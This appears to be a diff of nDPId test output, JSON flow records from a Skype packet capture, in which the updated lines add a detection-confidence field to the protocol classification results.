+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
